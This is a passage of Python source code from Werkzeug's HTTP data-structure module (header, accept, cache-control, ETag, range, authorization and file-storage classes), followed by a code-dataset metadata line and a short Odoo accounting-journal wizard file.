class EnvironHeaders(ImmutableHeadersMixin, Headers):
"""Read only version of the headers from a WSGI environment. This
provides the same interface as `Headers` and is constructed from
a WSGI environment.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
HTTP exceptions.
"""
def __init__(self, environ):
self.environ = environ
def __eq__(self, other):
return self.environ is other.environ
def __getitem__(self, key, _get_mode=False):
# _get_mode is a no-op for this class as there is no index but
# used because get() calls it.
key = key.upper().replace('-', '_')
if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
return _unicodify_header_value(self.environ[key])
return _unicodify_header_value(self.environ['HTTP_' + key])
def __len__(self):
# the iter is necessary because otherwise list calls our
# len which would call list again and so forth.
return len(list(iter(self)))
def __iter__(self):
for key, value in iteritems(self.environ):
if key.startswith('HTTP_') and key not in \
('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
yield (key[5:].replace('_', '-').title(),
_unicodify_header_value(value))
elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
yield (key.replace('_', '-').title(),
_unicodify_header_value(value))
def copy(self):
raise TypeError('cannot create %r copies' % self.__class__.__name__)
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
"""A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
instances as sequence and it will combine the return values of all wrapped
dicts:
>>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
>>> post = MultiDict([('foo', 'bar')])
>>> get = MultiDict([('blub', 'blah')])
>>> combined = CombinedMultiDict([get, post])
>>> combined['foo']
'bar'
>>> combined['blub']
'blah'
This works for all read operations and will raise a `TypeError` for
methods that usually change data which isn't possible.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
"""
def __reduce_ex__(self, protocol):
return type(self), (self.dicts,)
def __init__(self, dicts=None):
self.dicts = dicts or []
@classmethod
def fromkeys(cls):
raise TypeError('cannot create %r instances by fromkeys' %
cls.__name__)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise exceptions.BadRequestKeyError(key)
def get(self, key, default=None, type=None):
for d in self.dicts:
if key in d:
if type is not None:
try:
return type(d[key])
except ValueError:
continue
return d[key]
return default
def getlist(self, key, type=None):
rv = []
for d in self.dicts:
rv.extend(d.getlist(key, type))
return rv
def keys(self):
rv = set()
for d in self.dicts:
rv.update(d.keys())
return iter(rv)
__iter__ = keys
def items(self, multi=False):
found = set()
for d in self.dicts:
for key, value in iteritems(d, multi):
if multi:
yield key, value
elif key not in found:
found.add(key)
yield key, value
def values(self):
for key, value in iteritems(self):
yield value
def lists(self):
rv = {}
for d in self.dicts:
for key, values in iterlists(d):
rv.setdefault(key, []).extend(values)
return iteritems(rv)
def listvalues(self):
return (x[1] for x in self.lists())
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self.dicts[:])
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first item for each key.
:return: a :class:`dict`
"""
rv = {}
for d in reversed(self.dicts):
rv.update(d.to_dict(flat))
return rv
def __len__(self):
return len(self.keys())
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
"""A special :class:`MultiDict` that has convenience methods to add
files to it. This is used for :class:`EnvironBuilder` and generally
useful for unittesting.
.. versionadded:: 0.5
"""
def add_file(self, name, file, filename=None, content_type=None):
"""Adds a new file to the dict. `file` can be a file name or
a :class:`file`-like or a :class:`FileStorage` object.
:param name: the name of the field.
:param file: a filename or :class:`file`-like object
:param filename: an optional filename
:param content_type: an optional content type
"""
if isinstance(file, FileStorage):
value = file
else:
if isinstance(file, string_types):
if filename is None:
filename = file
file = open(file, 'rb')
if filename and content_type is None:
content_type = mimetypes.guess_type(filename)[0] or \
'application/octet-stream'
value = FileStorage(file, filename, name, content_type)
self.add(name, value)
class ImmutableDict(ImmutableDictMixin, dict):
"""An immutable :class:`dict`.
.. versionadded:: 0.5
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return dict(self)
def __copy__(self):
return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
"""An immutable :class:`MultiDict`.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return MultiDict(self)
def __copy__(self):
return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
"""An immutable :class:`OrderedMultiDict`.
.. versionadded:: 0.6
"""
def _iter_hashitems(self):
return enumerate(iteritems(self, multi=True))
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return OrderedMultiDict(self)
def __copy__(self):
return self
@native_itermethods(['values'])
class Accept(ImmutableList):
"""An :class:`Accept` object is just a list subclass for lists of
``(value, quality)`` tuples. It is automatically sorted by quality.
All :class:`Accept` objects work similar to a list but provide extra
functionality for working with the data. Containment checks are
normalized to the rules of that header:
>>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
>>> a.best
'ISO-8859-1'
>>> 'iso-8859-1' in a
True
>>> 'UTF8' in a
True
>>> 'utf7' in a
False
To get the quality for an item you can use normal item lookup:
>>> print a['utf-8']
0.7
>>> a['utf7']
0
.. versionchanged:: 0.5
:class:`Accept` objects are forced immutable now.
"""
def __init__(self, values=()):
if values is None:
list.__init__(self)
self.provided = False
elif isinstance(values, Accept):
self.provided = values.provided
list.__init__(self, values)
else:
self.provided = True
values = [(a, b) for b, a in values]
values.sort()
values.reverse()
list.__init__(self, [(a, b) for b, a in values])
def _value_matches(self, value, item):
"""Check if a value matches a given accept item."""
return item == '*' or item.lower() == value.lower()
def __getitem__(self, key):
"""Besides index lookup (getting item n) you can also pass it a string
to get the quality for the item. If the item is not in the list, the
returned quality is ``0``.
"""
if isinstance(key, string_types):
return self.quality(key)
return list.__getitem__(self, key)
def quality(self, key):
"""Returns the quality of the key.
.. versionadded:: 0.6
In previous versions you had to use the item-lookup syntax
(eg: ``obj[key]`` instead of ``obj.quality(key)``)
"""
for item, quality in self:
if self._value_matches(key, item):
return quality
return 0
def __contains__(self, value):
for item, quality in self:
if self._value_matches(value, item):
return True
return False
def __repr__(self):
return '%s([%s])' % (
self.__class__.__name__,
', '.join('(%r, %s)' % (x, y) for x, y in self)
)
def index(self, key):
"""Get the position of an entry or raise :exc:`ValueError`.
:param key: The key to be looked up.
.. versionchanged:: 0.5
This used to raise :exc:`IndexError`, which was inconsistent
with the list API.
"""
if isinstance(key, string_types):
for idx, (item, quality) in enumerate(self):
if self._value_matches(key, item):
return idx
raise ValueError(key)
return list.index(self, key)
def find(self, key):
"""Get the position of an entry or return -1.
:param key: The key to be looked up.
"""
try:
return self.index(key)
except ValueError:
return -1
def values(self):
"""Iterate over all values."""
for item in self:
yield item[0]
def to_header(self):
"""Convert the header set into an HTTP header string."""
result = []
for value, quality in self:
if quality != 1:
value = '%s;q=%s' % (value, quality)
result.append(value)
return ','.join(result)
def __str__(self):
return self.to_header()
def best_match(self, matches, default=None):
"""Returns the best match from a list of possible matches based
on the quality of the client. If two items have the same quality,
the one is returned that comes first.
:param matches: a list of matches to check for
:param default: the value that is returned if none match
"""
best_quality = -1
result = default
for server_item in matches:
for client_item, quality in self:
if quality <= best_quality:
break
if self._value_matches(server_item, client_item):
best_quality = quality
result = server_item
return result
@property
def best(self):
"""The best match as value."""
if self:
return self[0][0]
class MIMEAccept(Accept):
"""Like :class:`Accept` but with special methods and behavior for
mimetypes.
"""
def _value_matches(self, value, item):
def _normalize(x):
x = x.lower()
return x == '*' and ('*', '*') or x.split('/', 1)
# this is from the application which is trusted. to avoid developer
# frustration we actually check these for valid values
if '/' not in value:
raise ValueError('invalid mimetype %r' % value)
value_type, value_subtype = _normalize(value)
if value_type == '*' and value_subtype != '*':
raise ValueError('invalid mimetype %r' % value)
if '/' not in item:
return False
item_type, item_subtype = _normalize(item)
if item_type == '*' and item_subtype != '*':
return False
return (
(item_type == item_subtype == '*' or
value_type == value_subtype == '*') or
(item_type == value_type and (item_subtype == '*' or
value_subtype == '*' or
item_subtype == value_subtype))
)
@property
def accept_html(self):
"""True if this object accepts HTML."""
return (
'text/html' in self or
'application/xhtml+xml' in self or
self.accept_xhtml
)
@property
def accept_xhtml(self):
"""True if this object accepts XHTML."""
return (
'application/xhtml+xml' in self or
'application/xml' in self
)
@property
def accept_json(self):
"""True if this object accepts JSON."""
return 'application/json' in self
class LanguageAccept(Accept):
"""Like :class:`Accept` but with normalization for languages."""
def _value_matches(self, value, item):
def _normalize(language):
return _locale_delim_re.split(language.lower())
return item == '*' or _normalize(value) == _normalize(item)
class CharsetAccept(Accept):
"""Like :class:`Accept` but with normalization for charsets."""
def _value_matches(self, value, item):
def _normalize(name):
try:
return codecs.lookup(name).name
except LookupError:
return name.lower()
return item == '*' or _normalize(value) == _normalize(item)
def cache_property(key, empty, type):
"""Return a new property object for a cache header. Useful if you
want to add support for a cache extension in a subclass."""
return property(lambda x: x._get_cache_value(key, empty, type),
lambda x, v: x._set_cache_value(key, v, type),
lambda x: x._del_cache_value(key),
'accessor for %r' % key)
class _CacheControl(UpdateDictMixin, dict):
"""Subclass of a dict that stores values for a Cache-Control header. It
has accessors for all the cache-control directives specified in RFC 2616.
The class does not differentiate between request and response directives.
Because the cache-control directives in the HTTP header use dashes the
python descriptors use underscores for that.
To get a header of the :class:`CacheControl` object again you can convert
the object into a string or call the :meth:`to_header` method. If you plan
to subclass it and add your own items have a look at the sourcecode for
that class.
.. versionchanged:: 0.4
Setting `no_cache` or `private` to boolean `True` will set the implicit
none-value which is ``*``:
>>> cc = ResponseCacheControl()
>>> cc.no_cache = True
>>> cc
<ResponseCacheControl 'no-cache'>
>>> cc.no_cache
'*'
>>> cc.no_cache = None
>>> cc
<ResponseCacheControl ''>
In versions before 0.5 the behavior documented here affected the now
no longer existing `CacheControl` class.
"""
no_cache = cache_property('no-cache', '*', None)
no_store = cache_property('no-store', None, bool)
max_age = cache_property('max-age', -1, int)
no_transform = cache_property('no-transform', None, None)
def __init__(self, values=(), on_update=None):
dict.__init__(self, values or ())
self.on_update = on_update
self.provided = values is not None
def _get_cache_value(self, key, empty, type):
"""Used internally by the accessor properties."""
if type is bool:
return key in self
if key in self:
value = self[key]
if value is None:
return empty
elif type is not None:
try:
value = type(value)
except ValueError:
pass
return value
def _set_cache_value(self, key, value, type):
"""Used internally by the accessor properties."""
if type is bool:
if value:
self[key] = None
else:
self.pop(key, None)
else:
if value is None:
self.pop(key)
elif value is True:
self[key] = None
else:
self[key] = value
def _del_cache_value(self, key):
"""Used internally by the accessor properties."""
if key in self:
del self[key]
def to_header(self):
"""Convert the stored values into a cache control header."""
return dump_header(self)
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
"""A cache control for requests. This is immutable and gives access
to all the request-relevant cache control headers.
To get a header of the :class:`RequestCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
max_stale = cache_property('max-stale', '*', int)
min_fresh = cache_property('min-fresh', '*', int)
no_transform = cache_property('no-transform', None, None)
only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
"""A cache control for responses. Unlike :class:`RequestCacheControl`
this is mutable and gives access to response-relevant cache control
headers.
To get a header of the :class:`ResponseCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
public = cache_property('public', None, bool)
private = cache_property('private', '*', None)
must_revalidate = cache_property('must-revalidate', None, bool)
proxy_revalidate = cache_property('proxy-revalidate', None, bool)
s_maxage = cache_property('s-maxage', None, None)
# attach cache_property to the _CacheControl as staticmethod
# so that others can reuse it.
_CacheControl.cache_property = staticmethod(cache_property)
class CallbackDict(UpdateDictMixin, dict):
"""A dict that calls a function passed every time something is changed.
The function is passed the dict instance.
"""
def __init__(self, initial=None, on_update=None):
dict.__init__(self, initial or ())
self.on_update = on_update
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
dict.__repr__(self)
)
class HeaderSet(object):
"""Similar to the :class:`ETags` class this implements a set-like structure.
Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
content-language headers.
If not constructed using the :func:`parse_set_header` function the
instantiation works like this:
>>> hs = HeaderSet(['foo', 'bar', 'baz'])
>>> hs
HeaderSet(['foo', 'bar', 'baz'])
"""
def __init__(self, headers=None, on_update=None):
self._headers = list(headers or ())
self._set = set([x.lower() for x in self._headers])
self.on_update = on_update
def add(self, header):
"""Add a new header to the set."""
self.update((header,))
def remove(self, header):
"""Remove a header from the set. This raises an :exc:`KeyError` if the
header is not in the set.
.. versionchanged:: 0.5
In older versions a :exc:`IndexError` was raised instead of a
:exc:`KeyError` if the object was missing.
:param header: the header to be removed.
"""
key = header.lower()
if key not in self._set:
raise KeyError(header)
self._set.remove(key)
for idx, key in enumerate(self._headers):
if key.lower() == header:
del self._headers[idx]
break
if self.on_update is not None:
self.on_update(self)
def update(self, iterable):
"""Add all the headers from the iterable to the set.
:param iterable: updates the set with the items from the iterable.
"""
inserted_any = False
for header in iterable:
key = header.lower()
if key not in self._set:
self._headers.append(header)
self._set.add(key)
inserted_any = True
if inserted_any and self.on_update is not None:
self.on_update(self)
def discard(self, header):
"""Like :meth:`remove` but ignores errors.
:param header: the header to be discarded.
"""
try:
return self.remove(header)
except KeyError:
pass
def find(self, header):
"""Return the index of the header in the set or return -1 if not found.
:param header: the header to be looked up.
"""
header = header.lower()
for idx, item in enumerate(self._headers):
if item.lower() == header:
return idx
return -1
def index(self, header):
"""Return the index of the header in the set or raise an
:exc:`IndexError`.
:param header: the header to be looked up.
"""
rv = self.find(header)
if rv < 0:
raise IndexError(header)
return rv
def clear(self):
"""Clear the set."""
self._set.clear()
del self._headers[:]
if self.on_update is not None:
self.on_update(self)
def as_set(self, preserve_casing=False):
"""Return the set as real python set type. When calling this, all
the items are converted to lowercase and the ordering is lost.
:param preserve_casing: if set to `True` the items in the set returned
will have the original case like in the
:class:`HeaderSet`, otherwise they will
be lowercase.
"""
if preserve_casing:
return set(self._headers)
return set(self._set)
def to_header(self):
"""Convert the header set into an HTTP header string."""
return ', '.join(map(quote_header_value, self._headers))
def __getitem__(self, idx):
return self._headers[idx]
def __delitem__(self, idx):
rv = self._headers.pop(idx)
self._set.remove(rv.lower())
if self.on_update is not None:
self.on_update(self)
def __setitem__(self, idx, value):
old = self._headers[idx]
self._set.remove(old.lower())
self._headers[idx] = value
self._set.add(value.lower())
if self.on_update is not None:
self.on_update(self)
def __contains__(self, header):
return header.lower() in self._set
def __len__(self):
return len(self._set)
def __iter__(self):
return iter(self._headers)
def __nonzero__(self):
return bool(self._set)
def __str__(self):
return self.to_header()
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self._headers
)
class ETags(object):
"""A set that can be used to check if one etag is present in a collection
of etags.
"""
def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
self._strong = frozenset(not star_tag and strong_etags or ())
self._weak = frozenset(weak_etags or ())
self.star_tag = star_tag
def as_set(self, include_weak=False):
"""Convert the `ETags` object into a python set. Per default all the
weak etags are not part of this set."""
rv = set(self._strong)
if include_weak:
rv.update(self._weak)
return rv
def is_weak(self, etag):
"""Check if an etag is weak."""
return etag in self._weak
def contains_weak(self, etag):
"""Check if an etag is part of the set including weak and strong tags."""
return self.is_weak(etag) or self.contains(etag)
def contains(self, etag):
"""Check if an etag is part of the set ignoring weak tags.
It is also possible to use the ``in`` operator.
"""
if self.star_tag:
return True
return etag in self._strong
def contains_raw(self, etag):
"""When passed a quoted tag it will check if this tag is part of the
set. If the tag is weak it is checked against weak and strong tags,
otherwise strong only."""
etag, weak = unquote_etag(etag)
if weak:
return self.contains_weak(etag)
return self.contains(etag)
def to_header(self):
"""Convert the etags set into a HTTP header string."""
if self.star_tag:
return '*'
return ', '.join(
['"%s"' % x for x in self._strong] +
['w/"%s"' % x for x in self._weak]
)
def __call__(self, etag=None, data=None, include_weak=False):
if [etag, data].count(None) != 1:
raise TypeError('either tag or data required, but at least one')
if etag is None:
etag = generate_etag(data)
if include_weak:
if etag in self._weak:
return True
return etag in self._strong
def __nonzero__(self):
return bool(self.star_tag or self._strong or self._weak)
def __str__(self):
return self.to_header()
def __iter__(self):
return iter(self._strong)
def __contains__(self, etag):
return self.contains(etag)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class IfRange(object):
"""Very simple object that represents the `If-Range` header in parsed
form. It will either have neither a etag or date or one of either but
never both.
.. versionadded:: 0.7
"""
def __init__(self, etag=None, date=None):
#: The etag parsed and unquoted. Ranges always operate on strong
#: etags so the weakness information is not necessary.
self.etag = etag
#: The date in parsed format or `None`.
self.date = date
def to_header(self):
"""Converts the object back into an HTTP header."""
if self.date is not None:
return http_date(self.date)
if self.etag is not None:
return quote_etag(self.etag)
return ''
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Range(object):
"""Represents a range header. All the methods are only supporting bytes
as unit. It does store multiple ranges but :meth:`range_for_length` will
only work if only one range is provided.
.. versionadded:: 0.7
"""
def __init__(self, units, ranges):
#: The units of this range. Usually "bytes".
self.units = units
#: A list of ``(begin, end)`` tuples for the range header provided.
#: The ranges are non-inclusive.
self.ranges = ranges
def range_for_length(self, length):
"""If the range is for bytes, the length is not None and there is
exactly one range and it is satisfiable it returns a ``(start, stop)``
tuple, otherwise `None`.
"""
if self.units != 'bytes' or length is None or len(self.ranges) != 1:
return None
start, end = self.ranges[0]
if end is None:
end = length
if start < 0:
start += length
if is_byte_range_valid(start, end, length):
return start, min(end, length)
def make_content_range(self, length):
"""Creates a :class:`~werkzeug.datastructures.ContentRange` object
from the current range and given content length.
"""
rng = self.range_for_length(length)
if rng is not None:
return ContentRange(self.units, rng[0], rng[1], length)
def to_header(self):
"""Converts the object back into an HTTP header."""
ranges = []
for begin, end in self.ranges:
if end is None:
ranges.append(begin >= 0 and '%s-' % begin or str(begin))
else:
ranges.append('%s-%s' % (begin, end - 1))
return '%s=%s' % (self.units, ','.join(ranges))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class ContentRange(object):
"""Represents the content range header.
.. versionadded:: 0.7
"""
def __init__(self, units, start, stop, length=None, on_update=None):
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self.on_update = on_update
self.set(start, stop, length, units)
def _callback_property(name):
def fget(self):
return getattr(self, name)
def fset(self, value):
setattr(self, name, value)
if self.on_update is not None:
self.on_update(self)
return property(fget, fset)
#: The units to use, usually "bytes"
units = _callback_property('_units')
#: The start point of the range or `None`.
start = _callback_property('_start')
#: The stop point of the range (non-inclusive) or `None`. Can only be
#: `None` if also start is `None`.
stop = _callback_property('_stop')
#: The length of the range or `None`.
length = _callback_property('_length')
def set(self, start, stop, length=None, units='bytes'):
"""Simple method to update the ranges."""
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self._units = units
self._start = start
self._stop = stop
self._length = length
if self.on_update is not None:
self.on_update(self)
def unset(self):
"""Sets the units to `None` which indicates that the header should
no longer be used.
"""
self.set(None, None, units=None)
def to_header(self):
if self.units is None:
return ''
if self.length is None:
length = '*'
else:
length = self.length
if self.start is None:
return '%s */%s' % (self.units, length)
return '%s %s-%s/%s' % (
self.units,
self.start,
self.stop - 1,
length
)
def __nonzero__(self):
return self.units is not None
__bool__ = __nonzero__
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Authorization(ImmutableDictMixin, dict):
"""Represents an `Authorization` header sent by the client. You should
not create this kind of object yourself but use it when it's returned by
the `parse_authorization_header` function.
This object is a dict subclass and can be altered by setting dict items
but it should be considered immutable as it's returned by the client and
not meant for modifications.
.. versionchanged:: 0.5
This object became immutable.
"""
def __init__(self, auth_type, data=None):
dict.__init__(self, data or {})
self.type = auth_type
username = property(lambda x: x.get('username'), doc='''
The username transmitted. This is set for both basic and digest
auth all the time.''')
password = property(lambda x: x.get('password'), doc='''
When the authentication type is basic this is the password
transmitted by the client, else `None`.''')
realm = property(lambda x: x.get('realm'), doc='''
This is the server realm sent back for HTTP digest auth.''')
nonce = property(lambda x: x.get('nonce'), doc='''
The nonce the server sent for digest auth, sent back by the client.
A nonce should be unique for every 401 response for HTTP digest
auth.''')
uri = property(lambda x: x.get('uri'), doc='''
The URI from Request-URI of the Request-Line; duplicated because
proxies are allowed to change the Request-Line in transit. HTTP
digest auth only.''')
nc = property(lambda x: x.get('nc'), doc='''
The nonce count value transmitted by clients if a qop-header is
also transmitted. HTTP digest auth only.''')
cnonce = property(lambda x: x.get('cnonce'), doc='''
If the server sent a qop-header in the ``WWW-Authenticate``
header, the client has to provide this value for HTTP digest auth.
See the RFC for more details.''')
response = property(lambda x: x.get('response'), doc='''
A string of 32 hex digits computed as defined in RFC 2617, which
proves that the user knows a password. Digest auth only.''')
opaque = property(lambda x: x.get('opaque'), doc='''
The opaque header from the server returned unchanged by the client.
It is recommended that this string be base64 or hexadecimal data.
Digest auth only.''')
@property
def qop(self):
"""Indicates what "quality of protection" the client has applied to
the message for HTTP digest auth."""
def on_update(header_set):
if not header_set and 'qop' in self:
del self['qop']
elif header_set:
self['qop'] = header_set.to_header()
return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
"""Provides simple access to `WWW-Authenticate` headers."""
#: list of keys that require quoting in the generated header
_require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])
def __init__(self, auth_type=None, values=None, on_update=None):
dict.__init__(self, values or ())
if auth_type:
self['__auth_type__'] = auth_type
self.on_update = on_update
def set_basic(self, realm='authentication required'):
"""Clear the auth info and enable basic auth."""
dict.clear(self)
dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
if self.on_update:
self.on_update(self)
def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
algorithm=None, stale=False):
"""Clear the auth info and enable digest auth."""
d = {
'__auth_type__': 'digest',
'realm': realm,
'nonce': nonce,
'qop': dump_header(qop)
}
if stale:
d['stale'] = 'TRUE'
if opaque is not None:
d['opaque'] = opaque
if algorithm is not None:
d['algorithm'] = algorithm
dict.clear(self)
dict.update(self, d)
if self.on_update:
self.on_update(self)
def to_header(self):
"""Convert the stored values into a WWW-Authenticate header."""
d = dict(self)
auth_type = d.pop('__auth_type__', None) or 'basic'
return '%s %s' % (auth_type.title(), ', '.join([
'%s=%s' % (key, quote_header_value(value,
allow_token=key not in self._require_quoting))
for key, value in iteritems(d)
]))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
def auth_property(name, doc=None):
"""A static helper function for subclasses to add extra authentication
system properties onto a class::
class FooAuthenticate(WWWAuthenticate):
special_realm = auth_property('special_realm')
For more information have a look at the sourcecode to see how the
regular properties (:attr:`realm` etc.) are implemented.
"""
def _set_value(self, value):
if value is None:
self.pop(name, None)
else:
self[name] = str(value)
return property(lambda x: x.get(name), _set_value, doc=doc)
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self:
del self[name]
elif header_set:
self[name] = header_set.to_header()
return parse_set_header(self.get(name), on_update)
return property(fget, doc=doc)
type = auth_property('__auth_type__', doc='''
The type of the auth mechanism. HTTP currently specifies
`Basic` and `Digest`.''')
realm = auth_property('realm', doc='''
A string to be displayed to users so they know which username and
password to use. This string should contain at least the name of
the host performing the authentication and might additionally
indicate the collection of users who might have access.''')
domain = _set_property('domain', doc='''
A list of URIs that define the protection space. If a URI is an
absolute path, it is relative to the canonical root URL of the
server being accessed.''')
nonce = auth_property('nonce', doc='''
A server-specified data string which should be uniquely generated
each time a 401 response is made. It is recommended that this
string be base64 or hexadecimal data.''')
opaque = auth_property('opaque', doc='''
A string of data, specified by the server, which should be returned
by the client unchanged in the Authorization header of subsequent
requests with URIs in the same protection space. It is recommended
that this string be base64 or hexadecimal data.''')
algorithm = auth_property('algorithm', doc='''
A string indicating a pair of algorithms used to produce the digest
and a checksum. If this is not present it is assumed to be "MD5".
If the algorithm is not understood, the challenge should be ignored
(and a different one used, if there is more than one).''')
qop = _set_property('qop', doc='''
A set of quality-of-privacy directives such as auth and auth-int.''')
def _get_stale(self):
val = self.get('stale')
if val is not None:
return val.lower() == 'true'
def _set_stale(self, value):
if value is None:
self.pop('stale', None)
else:
self['stale'] = value and 'TRUE' or 'FALSE'
stale = property(_get_stale, _set_stale, doc='''
A flag, indicating that the previous request from the client was
rejected because the nonce value was stale.''')
del _get_stale, _set_stale
# make auth_property a staticmethod so that subclasses of
# `WWWAuthenticate` can use it for new properties.
auth_property = staticmethod(auth_property)
del _set_property
class FileStorage(object):
"""The :class:`FileStorage` class is a thin wrapper over incoming files.
It is used by the request object to represent uploaded files. All the
attributes of the wrapper stream are proxied by the file storage so
it's possible to do ``storage.read()`` instead of the long form
``storage.stream.read()``.
"""
def __init__(self, stream=None, filename=None, name=None,
content_type=None, content_length=None,
headers=None):
self.name = name
self.stream = stream or _empty_stream
# if no filename is provided we can attempt to get the filename
# from the stream object passed. There we have to be careful to
# skip things like <fdopen>, <stderr> etc. Python marks these
# special filenames with angular brackets.
if filename is None:
filename = getattr(stream, 'name', None)
s = make_literal_wrapper(filename)
if filename and filename[0] == s('<') and filename[-1] == s('>'):
filename = None
# On Python 3 we want to make sure the filename is always unicode.
# This might not be if the name attribute is bytes due to the
# file being opened from the bytes API.
if not PY2 and isinstance(filename, bytes):
filename = filename.decode(sys.getfilesystemencoding(),
'replace')
self.filename = filename
if headers is None:
headers = Headers()
self.headers = headers
if content_type is not None:
headers['Content-Type'] = content_type
if content_length is not None:
headers['Content-Length'] = str(content_length)
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.content_type)
@property
def content_type(self):
"""The content-type sent in the header. Usually not available"""
return self.headers.get('content-type')
@property
def content_length(self):
"""The content-length sent in the header. Usually not available"""
return int(self.headers.get('content-length') or 0)
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[1]
def save(self, dst, buffer_size=16384):
"""Save the file to a destination path or file object. If the
destination is a file object you have to close it yourself after the
call. The buffer size is the number of bytes held in memory during
the copy process. It defaults to 16KB.
For secure file saving also have a look at :func:`secure_filename`.
:param dst: a filename or open file object the uploaded file
is saved to.
:param buffer_size: the size of the buffer. This works the same as
the `length` parameter of
:func:`shutil.copyfileobj`.
"""
from shutil import copyfileobj
close_dst = False
if isinstance(dst, string_types):
dst = open(dst, 'wb')
close_dst = True
try:
copyfileobj(self.stream, dst, buffer_size)
finally:
if close_dst:
dst.close()
def close(self):
"""Close the underlying file if possible."""
try:
self.stream.close()
except Exception:
pass
def __nonzero__(self):
return bool(self.filename)
def __getattr__(self, name):
return getattr(self.stream, name)
def __iter__(self):
return iter(self.readline, '')
def __repr__(self):
return '<%s: %r (%r)>' % (
self.__class__.__name__,
self.filename,
self.content_type
)
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
| apache-2.0 |
alexcuellar/odoo | addons/account/wizard/account_report_central_journal.py | 378 | 1697 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_central_journal(osv.osv_memory):
_name = 'account.central.journal'
_description = 'Account Central Journal'
_inherit = "account.common.journal.report"
_columns = {
'journal_ids': fields.many2many('account.journal', 'account_central_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
